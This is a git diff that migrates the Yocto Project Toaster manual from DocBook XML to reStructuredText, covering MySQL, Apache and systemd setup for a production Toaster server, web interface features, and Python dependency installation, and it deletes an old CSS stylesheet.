- 'ENGINE': 'django.db.backends.mysql',
- 'NAME': 'toaster_data',
- 'USER': 'toaster',
- 'PASSWORD': 'yourpasswordhere',
- 'HOST': 'localhost',
- 'PORT': '3306',
- }
- }
- </literallayout>
- </para></listitem>
- <listitem><para>
- Edit the
- <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#std:setting-SECRET_KEY'>SECRET_KEY</ulink>:
- <literallayout class='monospaced'>
- SECRET_KEY = '<replaceable>your_secret_key</replaceable>'
- </literallayout>
- </para></listitem>
- <listitem><para>
- Edit the
- <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#std:setting-STATIC_ROOT'>STATIC_ROOT</ulink>:
- <literallayout class='monospaced'>
- STATIC_ROOT = '/var/www/toaster/static_files/'
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- Add the database and user to the <filename>mysql</filename>
- server defined earlier:
- <literallayout class='monospaced'>
- $ mysql -u root -p
- mysql> CREATE DATABASE toaster_data;
- mysql> CREATE USER 'toaster'@'localhost' identified by 'yourpasswordhere';
- mysql> GRANT all on toaster_data.* to 'toaster'@'localhost';
- mysql> quit
- </literallayout>
- </para></listitem>
- <listitem><para>
- Get Toaster to create the database schema,
- default data, and gather the statically-served files:
- <literallayout class='monospaced'>
- $ cd /var/www/toaster/poky/
- $ ./bitbake/lib/toaster/manage.py migrate
- $ TOASTER_DIR=`pwd` TEMPLATECONF='poky' \
- ./bitbake/lib/toaster/manage.py checksettings
- $ ./bitbake/lib/toaster/manage.py collectstatic
- </literallayout>
- In the previous example, from the <filename>poky</filename>
- directory, the <filename>migrate</filename> command
- ensures the database schema changes have propagated
- correctly (i.e. migrations).
- The next line sets the Toaster root directory
- <filename>TOASTER_DIR</filename> and the location
- of the Toaster configuration file
- <filename>TOASTER_CONF</filename>, which is relative to
- <filename>TOASTER_DIR</filename>.
- The <filename>TEMPLATECONF</filename> value reflects the
- contents of <filename>poky/.templateconf</filename>, and
- by default, should include the string "poky".
- For more information on the Toaster configuration
- file, see the
- "<link linkend='configuring-toaster'>Configuring Toaster</link>"
- section.</para>
-
- <para>This line also runs the <filename>checksettings</filename>
- command, which configures the location of the Toaster
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- The Toaster root directory <filename>TOASTER_DIR</filename>
- determines where the Toaster build directory
- is created on the file system.
- In the example above,
- <filename>TOASTER_DIR</filename> is set as follows:
- <literallayout class="monospaced">
- /var/www/toaster/poky
- </literallayout>
- This setting causes the Toaster build directory to be:
- <literallayout class="monospaced">
- /var/www/toaster/poky/build
- </literallayout></para>
-
- <para>Finally, the <filename>collectstatic</filename> command
- is a Django framework command that collects all the
- statically served files into a designated directory to
- be served up by the Apache web server as defined by
- <filename>STATIC_ROOT</filename>.
- </para></listitem>
- <listitem><para>
- Test and/or use the Mysql integration with Toaster’s
- Django web server.
- At this point, you can start up the normal Toaster
- Django web server with the Toaster database in Mysql.
- You can use this web server to confirm that the database
- migration and data population from the Layer Index is
- complete.</para>
-
- <para>To start the default Toaster Django web server with
- the Toaster database now in Mysql, use the standard
- start commands:
- <literallayout class='monospaced'>
- $ source oe-init-build-env
- $ source toaster start
- </literallayout>
- Additionally, if Django is sufficient for your requirements,
- you can use it for your release system and migrate later
- to Apache as your requirements change.
- </para></listitem>
- <listitem><para>
- Add an Apache configuration file for Toaster to your Apache web
- server's configuration directory.
- If you are using Ubuntu or Debian, put the file here:
- <literallayout class='monospaced'>
- /etc/apache2/conf-available/toaster.conf
- </literallayout>
- If you are using Fedora or RedHat, put it here:
- <literallayout class='monospaced'>
- /etc/httpd/conf.d/toaster.conf
- </literallayout>
- If you are using OpenSUSE, put it here:
- <literallayout class='monospaced'>
- /etc/apache2/conf.d/toaster.conf
- </literallayout>
- Following is a sample Apache configuration for Toaster
- you can follow:
- <literallayout class='monospaced'>
- Alias /static /var/www/toaster/static_files
- &lt;Directory /var/www/toaster/static_files&gt;
- &lt;IfModule mod_access_compat.c&gt;
- Order allow,deny
- Allow from all
- &lt;/IfModule&gt;
- &lt;IfModule !mod_access_compat.c&gt;
- Require all granted
- &lt;/IfModule&gt;
- &lt;/Directory&gt;
-
- &lt;Directory /var/www/toaster/poky/bitbake/lib/toaster/toastermain&gt;
- &lt;Files "wsgi.py"&gt;
- Require all granted
- &lt;/Files&gt;
- &lt;/Directory&gt;
-
- WSGIDaemonProcess toaster_wsgi python-path=/var/www/toaster/poky/bitbake/lib/toaster:/var/www/toaster/.local/lib/python3.4/site-packages
-
- WSGIScriptAlias / "/var/www/toaster/poky/bitbake/lib/toaster/toastermain/wsgi.py"
- &lt;Location /&gt;
- WSGIProcessGroup toaster_wsgi
- &lt;/Location&gt;
- </literallayout>
- If you are using Ubuntu or Debian,
- you will need to enable the config and module for Apache:
- <literallayout class='monospaced'>
- $ sudo a2enmod wsgi
- $ sudo a2enconf toaster
- $ chmod +x bitbake/lib/toaster/toastermain/wsgi.py
- </literallayout>
- Finally, restart Apache to make sure all new configuration
- is loaded.
- For Ubuntu, Debian, and OpenSUSE use:
- <literallayout class='monospaced'>
- $ sudo service apache2 restart
- </literallayout>
- For Fedora and RedHat use:
- <literallayout class='monospaced'>
- $ sudo service httpd restart
- </literallayout>
- </para></listitem>
- <listitem><para>
- Prepare the systemd service to run Toaster builds.
- Here is a sample configuration file for the service:
- <literallayout class='monospaced'>
- [Unit]
- Description=Toaster runbuilds
-
- [Service]
- Type=forking
- User=toaster
- ExecStart=/usr/bin/screen -d -m -S runbuilds /var/www/toaster/poky/bitbake/lib/toaster/runbuilds-service.sh start
- ExecStop=/usr/bin/screen -S runbuilds -X quit
- WorkingDirectory=/var/www/toaster/poky
-
- [Install]
- WantedBy=multi-user.target
- </literallayout>
- Prepare the <filename>runbuilds-service.sh</filename>
- script that you need to place in the
- <filename>/var/www/toaster/poky/bitbake/lib/toaster/</filename>
- directory by setting up executable permissions:
- <literallayout class='monospaced'>
- #!/bin/bash
-
- #export http_proxy=http://proxy.host.com:8080
- #export https_proxy=http://proxy.host.com:8080
- #export GIT_PROXY_COMMAND=$HOME/bin/gitproxy
-
- cd ~/poky/
- source ./oe-init-build-env build
- source ../bitbake/bin/toaster $1 noweb
- [ "$1" == 'start' ] &amp;&amp; /bin/bash
- </literallayout>
- </para></listitem>
- <listitem><para>
- Run the service:
- <literallayout class='monospaced'>
- # service runbuilds start
- </literallayout>
- Since the service is running in a detached screen
- session, you can attach to it using this command:
- <literallayout class='monospaced'>
- $ sudo su - toaster
- $ screen -rS runbuilds
- </literallayout>
- You can detach from the service again using "Ctrl-a"
- followed by "d" key combination.
- </para></listitem>
- </orderedlist>
- You can now open up a browser and start using Toaster.
- </para>
- </section>
- </section>
-
- <section id='using-the-toaster-web-interface'>
- <title>Using the Toaster Web Interface</title>
-
- <para>
- The Toaster web interface allows you to do the following:
- <itemizedlist>
- <listitem><para>
- Browse published layers in the
- <ulink url='http://layers.openembedded.org'>OpenEmbedded Layer Index</ulink>
- that are available for your selected version of the build
- system.
- </para></listitem>
- <listitem><para>
- Import your own layers for building.
- </para></listitem>
- <listitem><para>
- Add and remove layers from your configuration.
- </para></listitem>
- <listitem><para>
- Set configuration variables.
- </para></listitem>
- <listitem><para>
- Select a target or multiple targets to build.
- </para></listitem>
- <listitem><para>
- Start your builds.
- </para></listitem>
- <listitem><para>
- See what was built (recipes and packages) and what
- packages were installed into your final image.
- </para></listitem>
- <listitem><para>
- Browse the directory structure of your image.
- </para></listitem>
- <listitem><para>
- See the value of all variables in your build configuration,
- and which files set each value.
- </para></listitem>
- <listitem><para>
- Examine error, warning and trace messages to aid in
- debugging.
- </para></listitem>
- <listitem><para>
- See information about the BitBake tasks executed and
- reused during your build, including those that used
- shared state.
- </para></listitem>
- <listitem><para>
- See dependency relationships between recipes, packages
- and tasks.
- </para></listitem>
- <listitem><para>
- See performance information such as build time, task time,
- CPU usage, and disk I/O.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='web-interface-videos'>
- <title>Toaster Web Interface Videos</title>
-
- <para>
- Following are several videos that show how to use the Toaster GUI:
- <itemizedlist>
- <listitem><para><emphasis>Build Configuration:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=qYgDZ8YzV6w'>video</ulink>
- overviews and demonstrates build configuration for Toaster.
- </para></listitem>
- <listitem><para><emphasis>Build Custom Layers:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=QJzaE_XjX5c'>video</ulink>
- shows you how to build custom layers that are used with
- Toaster.
- </para></listitem>
- <listitem><para><emphasis>Toaster Homepage and Table Controls:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=QEARDnrR1Xw'>video</ulink>
- goes over the Toaster entry page, and provides
- an overview of the data manipulation capabilities of
- Toaster, which include search, sorting and filtering by
- different criteria.
- </para></listitem>
- <listitem><para><emphasis>Build Dashboard:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=KKqHYcnp2gE'>video</ulink>
- shows you the build dashboard, a page providing an
- overview of the information available for a selected build.
- </para></listitem>
- <listitem><para><emphasis>Image Information:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=XqYGFsmA0Rw'>video</ulink>
- walks through the information Toaster provides
- about images: packages installed and root file system.
- </para></listitem>
- <listitem><para><emphasis>Configuration:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=UW-j-T2TzIg'>video</ulink>
- provides Toaster build configuration information.
- </para></listitem>
- <listitem><para><emphasis>Tasks:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=D4-9vGSxQtw'>video</ulink>
- shows the information Toaster provides about the
- tasks run by the build system.
- </para></listitem>
- <listitem><para><emphasis>Recipes and Packages Built:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=x-6dx4huNnw'>video</ulink>
- shows the information Toaster provides about recipes
- and packages built.
- </para></listitem>
- <listitem><para><emphasis>Performance Data:</emphasis>
- This
- <ulink url='https://www.youtube.com/watch?v=qWGMrJoqusQ'>video</ulink>
- shows the build performance data provided by
- Toaster.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='a-note-on-the-local-yocto-project-release'>
- <title>Additional Information About the Local Yocto Project Release</title>
-
- <para>
- This section only applies if you have set up Toaster
- for local development, as explained in the
- "<link linkend='starting-toaster-for-local-development'>Starting Toaster for Local Development</link>"
- section.
- </para>
-
- <para>
- When you create a project in Toaster, you will be asked to
- provide a name and to select a Yocto Project release.
- One of the release options you will find is called
- "Local Yocto Project".
- <imagedata fileref="figures/new-project.png" align="center" width="9in" />
- </para>
-
- <para>
- When you select the "Local Yocto Project" release, Toaster
- will run your builds using the local Yocto
- Project clone you have in your computer: the same clone
- you are using to run Toaster.
- Unless you manually update
- this clone, your builds will always use the same Git revision.
- </para>
-
- <para>
- If you select any of the other release options, Toaster
- will fetch the tip of your selected release from the upstream
- <ulink url='https://git.yoctoproject.org'>Yocto Project repository</ulink>
- every time you run a build.
- Fetching this tip effectively
- means that if your selected release is updated upstream, the
- Git revision you are using for your builds will change.
- If you are doing development locally, you might not want this
- change to happen.
- In that case, the "Local Yocto Project"
- release might be the right choice.
- </para>
-
- <para>
- However, the "Local Yocto Project" release
- will not provide you with any compatible layers, other than the
- three core layers that come with the Yocto Project:
- <itemizedlist>
- <listitem><para>
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/openembedded-core/'>openembedded-core</ulink>
- </para></listitem>
- <listitem><para>
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/meta-poky/'>meta-poky</ulink>
- </para></listitem>
- <listitem><para>
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layer/meta-yocto-bsp/'>meta-yocto-bsp</ulink>
- </para></listitem>
- </itemizedlist>
- <imagedata fileref="figures/compatible-layers.png" align="center" width="9in" />
- </para>
-
- <para>
- If you want to build any other layers, you will need to
- manually import them into your Toaster project, using the
- "Import layer" page.
- <imagedata fileref="figures/import-layer.png" align="center" width="9in" />
- </para>
-
- </section>
-
- <section id='toaster-web-interface-preferred-version'>
- <title>Building a Specific Recipe Given Multiple Versions</title>
-
- <para>
- Occasionally, a layer might provide more than one version of
- the same recipe.
- For example, the <filename>openembedded-core</filename> layer
- provides two versions of the <filename>bash</filename> recipe
- (i.e. 3.2.48 and 4.3.30-r0) and two versions of the
- <filename>which</filename> recipe (i.e. 2.21 and 2.18).
- The following figure shows this exact scenario:
- <imagedata fileref="figures/bash-oecore.png" align="center" width="9in" depth="6in" />
- </para>
-
- <para>
- By default, the OpenEmbedded build system builds one of the
- two recipes.
- For the <filename>bash</filename> case, version 4.3.30-r0 is
- built by default.
- Unfortunately, Toaster as it exists, is not able to override
- the default recipe version.
- If you would like to build bash 3.2.48, you need to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink>
- variable.
- You can do so from Toaster, using the "Add variable" form,
- which is available in the "BitBake variables" page of the
- project configuration section as shown in the following screen:
- <imagedata fileref="figures/add-variable.png" align="center" width="9in" depth="6in" />
- </para>
-
- <para>
- To specify <filename>bash</filename> 3.2.48 as the version to build,
- enter "PREFERRED_VERSION_bash" in the "Variable" field, and "3.2.48"
- in the "Value" field.
- Next, click the "Add variable" button:
- <imagedata fileref="figures/set-variable.png" align="center" width="9in" depth="6in" />
- </para>
-
- <para>
- After clicking the "Add variable" button, the settings for
- <filename>PREFERRED_VERSION</filename> are added to the bottom
- of the BitBake variables list.
- With these settings, the OpenEmbedded build system builds the
- desired version of the recipe rather than the default version:
- <imagedata fileref="figures/variable-added.png" align="center" width="9in" depth="6in" />
- </para>
- </section>
- </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-start.rst b/documentation/toaster-manual/toaster-manual-start.rst
new file mode 100644
index 0000000000..267f9f4cdc
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual-start.rst
@@ -0,0 +1,57 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. Set default pygments highlighting to shell for this document
+.. highlight:: shell
+
+************************
+Preparing to Use Toaster
+************************
+
+This chapter describes how you need to prepare your system in order to
+use Toaster.
+
+.. _toaster-setting-up-the-basic-system-requirements:
+
+Setting Up the Basic System Requirements
+========================================
+
+Before you can use Toaster, you need to first set up your build system
+to run the Yocto Project. To do this, follow the instructions in the
+":ref:`dev-manual/dev-manual-start:preparing the build host`" section of
+the Yocto Project Development Tasks Manual. For Ubuntu/Debian, you might
+also need to do an additional install of pip3. ::
+
+ $ sudo apt-get install python3-pip
+
+.. _toaster-establishing-toaster-system-dependencies:
+
+Establishing Toaster System Dependencies
+========================================
+
+Toaster requires extra Python dependencies in order to run. A Toaster
+requirements file named ``toaster-requirements.txt`` defines the Python
+dependencies. The requirements file is located in the ``bitbake``
+directory, which is located in the root directory of the
+:term:`Source Directory` (e.g.
+``poky/bitbake/toaster-requirements.txt``). The dependencies appear in a
+``pip``, install-compatible format.
+
+.. _toaster-load-packages:
+
+Install Toaster Packages
+------------------------
+
+You need to install the packages that Toaster requires. Use this
+command::
+
+ $ pip3 install --user -r bitbake/toaster-requirements.txt
+
+The previous command installs the necessary Toaster modules into a local
+python 3 cache in your ``$HOME`` directory. The caches is actually
+located in ``$HOME/.local``. To see what packages have been installed
+into your ``$HOME`` directory, do the following::
+
+ $ pip3 list installed --local
+
+If you need to remove something, the following works::
+
+ $ pip3 uninstall PackageNameToUninstall
diff --git a/documentation/toaster-manual/toaster-manual-start.xml b/documentation/toaster-manual/toaster-manual-start.xml
deleted file mode 100644
index fc187ecd5e..0000000000
--- a/documentation/toaster-manual/toaster-manual-start.xml
+++ /dev/null
@@ -1,115 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-start'>
-
-<title>Preparing to Use Toaster</title>
-
- <para>
- This chapter describes how you need to prepare your system in order to
- use Toaster.
- </para>
-
- <section id='toaster-setting-up-the-basic-system-requirements'>
- <title>Setting Up the Basic System Requirements</title>
-
- <para>
- Before you can use Toaster, you need to first set up your
- build system to run the Yocto Project.
- To do this, follow the instructions in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section of the Yocto Project Development Tasks
- Manual.
- For Ubuntu/Debian, you might also need to do an additional install
- of pip3.
- <literallayout class='monospaced'>
- $ sudo apt-get install python3-pip
- </literallayout>
- </para>
- </section>
-
- <section id='toaster-establishing-toaster-system-dependencies'>
- <title>Establishing Toaster System Dependencies</title>
-
- <para>
- Toaster requires extra Python dependencies in order to run.
- A Toaster requirements file named
- <filename>toaster-requirements.txt</filename> defines the
- Python dependencies.
- The requirements file is located in the
- <filename>bitbake</filename> directory, which is located in the
- root directory of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky/bitbake/toaster-requirements.txt</filename>).
- The dependencies appear in a <filename>pip</filename>,
- install-compatible format.
- </para>
-
- <section id='toaster-load-packages'>
- <title>Install Toaster Packages</title>
-
- <para>
- You need to install the packages that Toaster requires.
- Use this command:
- <literallayout class='monospaced'>
- $ pip3 install --user -r bitbake/toaster-requirements.txt
- </literallayout>
- The previous command installs the necessary Toaster modules
- into a local python 3 cache in your
- <filename>$HOME</filename> directory.
- The caches is actually located in
- <filename>$HOME/.local</filename>.
- To see what packages have been installed into your
- <filename>$HOME</filename> directory, do the following:
- <literallayout class='monospaced'>
- $ pip3 list installed --local
- </literallayout>
- If you need to remove something, the following works:
- <literallayout class='monospaced'>
- $ pip3 uninstall PackageNameToUninstall
- </literallayout>
- </para>
- </section>
-
-<!-- Commenting this section out for now in case it needs to be used again.
-
- <section id='toaster-install-daemon'>
- <title>Install <filename>daemon</filename></title>
-
- <para>
- Toaster depends on
- <ulink url='http://www.libslack.org/daemon/'><filename>daemon</filename></ulink>.
- Depending on your distribution, how you install
- <filename>daemon</filename> differs:
- <itemizedlist>
- <listitem><para><emphasis>Debian-Based Systems:</emphasis>
- If you are running a Debian-based distribution,
- install <filename>daemon</filename> using the
- following command:
- <literallayout class='monospaced'>
- $ sudo apt-get install daemon​
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Non-Debian-Based Systems:</emphasis>
- If you are not running a Debian-based distribution
- (Redhat-based distribution such as Fedora),
- you need to download ​the file relevant to the
- architecture and then install
- <filename>daemon</filename> manually.
- Following are the commands for 64-bit distributions:
- <literallayout class='monospaced'>
- $ wget http://libslack.org/daemon/download/daemon-0.6.4-1.x86_64.rpm
- $ sudo rpm -i daemon-0.6.4-1.x86_64.rpm
- </literallayout>
- Here are the commands for a 32-bit distribution:
- <literallayout class='monospaced'>
- $ wget http://libslack.org/daemon/download/daemon-0.6.4-1.i686.rpm
- $ sudo rpm -i ​daemon-0.6.4-1.i686.rpm​
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
- </section> -->
- </section>
-</chapter>
diff --git a/documentation/toaster-manual/toaster-manual-style.css b/documentation/toaster-manual/toaster-manual-style.css
deleted file mode 100644
index 6d6b9fb65d..0000000000
--- a/documentation/toaster-manual/toaster-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/toaster-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
